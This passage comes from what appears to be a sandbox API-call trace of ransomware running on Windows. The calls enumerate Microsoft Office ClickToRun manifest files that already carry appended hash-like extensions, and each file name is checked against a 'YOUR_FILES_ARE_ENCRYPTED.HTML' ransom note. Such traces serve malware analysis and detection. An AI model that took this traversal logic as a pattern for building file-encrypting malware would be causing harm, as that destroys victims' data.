ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x2b14, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026", cAlternateFileName="C2RMAN~1.E30")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026") returned 183 [0109.836] PathFindExtensionW (pszPath="C2RManifest.osmmui.msi.16.en-us.xml.E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026") returned=".E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026" [0109.836] lstrlenW (lpString=".E305005790B2BE59E81A8183ACE8E67BA5253AF8A80207C47F3F014324EDB026") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4f8c1, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d4f8c1, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae13cb4e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D", cAlternateFileName="C2RMAN~1.3AA")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D") returned 196 [0109.836] PathFindExtensionW (pszPath="C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D") returned=".3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D" [0109.836] lstrlenW (lpString=".3AA7C3F06C702F5C1EBE88CCBB16A8A3A4DC5979CF70798FCA87BA6392D8542D") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d4d28a, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d4d28a, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae157278, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x2698, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A", cAlternateFileName="C2RMAN~1.EDE")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A") returned 185 [0109.836] PathFindExtensionW (pszPath="C2RManifest.osmuxmui.msi.16.en-us.xml.EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A") returned=".EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A" [0109.836] lstrlenW (lpString=".EDE9707DD16E2F753267C83192ED6DF43086DBF39DCFBBF303747CC7E705236A") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d47160, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d47160, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae19e5ee, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x16c9a, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F", cAlternateFileName="C2RMAN~1.565")) returned 1 [0109.836] StrStrIW (lpFirst="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.836] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F") returned 200 [0109.836] PathFindExtensionW (pszPath="C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F") returned=".56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F" [0109.836] lstrlenW (lpString=".56538CCB850B5F89A694F1C43C2F98F716EA047B025B9ED24D6A55D0EC90F40F") returned 65 [0109.836] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d39ab3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82d39ab3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae1bf7a9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x178c4, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054", cAlternateFileName="C2RMAN~1.893")) returned 1 [0109.837] StrStrIW (lpFirst="C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.837] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054") returned 187 [0109.837] PathFindExtensionW (pszPath="C2RManifest.outlookmui.msi.16.en-us.xml.893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054") returned=".893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054" [0109.837] lstrlenW (lpString=".893EB23CCAF9B37C110091634DF95E35230584572330B8022EEAAD03FAD91054") returned 65 [0109.837] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82cc820c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82cc820c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae21ab7b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xadce8, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236", cAlternateFileName="C2RMAN~1.E58")) returned 1 [0109.837] StrStrIW (lpFirst="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.837] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236") returned 206 [0109.837] PathFindExtensionW (pszPath="C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236") returned=".E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236" [0109.837] lstrlenW (lpString=".E5889A30DD02959D351CFF516A75E662AAED86DFB860C5F8D98972DBF4CC6236") returned 65 [0109.837] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82bf5a6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82bf5a6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae284ea2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x19170, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E", cAlternateFileName="C2RMAN~1.7B8")) returned 1 [0109.837] StrStrIW (lpFirst="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.837] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E") returned 206 [0109.837] PathFindExtensionW (pszPath="C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E") returned=".7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E" [0109.837] lstrlenW (lpString=".7B83B07F21609A71A3FD4235E905A472D194FACEBB3A0C15A454B45A3191817E") returned 65 [0109.837] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae29a423, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x684e, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19", cAlternateFileName="C2RMAN~1.D3C")) returned 1 [0109.837] StrStrIW (lpFirst="C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19") returned 190 [0109.838] PathFindExtensionW (pszPath="C2RManifest.powerpointmui.msi.16.en-us.xml.D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19") returned=".D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19" [0109.838] lstrlenW (lpString=".D3C8529FF6BF133EB9067BB9985D30A31728CF37E0C37803F1991CE4FEDA6B19") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae2b692b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x636e, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378", cAlternateFileName="C2RMAN~1.C20")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378") returned 190 [0109.838] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml.C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378") returned=".C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378" [0109.838] lstrlenW (lpString=".C20683C0006D2655F4257AB56BA8B0480ADB8A138CCF3FD50CD0F3712DC70378") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae2d4a3f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439", cAlternateFileName="C2RMAN~1.3AC")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439") returned 190 [0109.838] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml.3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439") returned=".3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439" [0109.838] lstrlenW (lpString=".3AC02768EEEA551ACE188A88E79694B27EFFC72B1DD8004EE55DC60F3C5E5439") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae3065cd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24", cAlternateFileName="C2RMAN~1.A3D")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24") returned 190 [0109.838] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24") returned=".A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24" [0109.838] lstrlenW (lpString=".A3D40FC656F90E65046DFC37D8CADB1300EEA7404D69DE8B1260CA70BDB23F24") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae363180, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F", cAlternateFileName="C2RMAN~1.8E5")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F") returned 185 [0109.838] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml.8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F") returned=".8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F" [0109.838] lstrlenW (lpString=".8E5E7FDBDEB1019E1F1AF327D35157DB6B53043004BCB0EE66B08BBDA398CD3F") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b36b6e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b36b6e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae38705f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B", cAlternateFileName="C2RMAN~1.E3F")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B") returned 204 [0109.838] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B") returned=".E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B" [0109.838] lstrlenW (lpString=".E3F9B213894F112B0C01978CCFCDF184D4E01A29BC765EF8F5403D6F08A0087B") returned 65 [0109.838] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82b2cf46, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82b2cf46, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae39d47b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B", cAlternateFileName="C2RMAN~1.C16")) returned 1 [0109.838] StrStrIW (lpFirst="C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.838] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B") returned 189 [0109.838] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml.C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B") returned=".C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B" [0109.839] lstrlenW (lpString=".C16446B4E80F2AE98978CF024444CF109316D036D8758840BA3EF6481F259C7B") returned 65 [0109.839] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82adb9f9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82adb9f9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae3f2325, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72", cAlternateFileName="C2RMAN~1.4F9")) returned 1 [0109.839] StrStrIW (lpFirst="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.839] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72") returned 198 [0109.845] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72") returned=".4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72" [0109.845] lstrlenW (lpString=".4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72") returned 65 [0109.845] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82a0dba7, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x82a0dba7, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xae45ba1c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735", cAlternateFileName="C2RMAN~1.393")) returned 1 [0109.845] StrStrIW (lpFirst="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.845] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735") returned 194 [0109.846] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735") returned=".3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735" [0109.846] lstrlenW (lpString=".3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735") returned 65 [0109.846] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8297548b, ftCreationTime.dwHighDateTime=0x1d705ed, 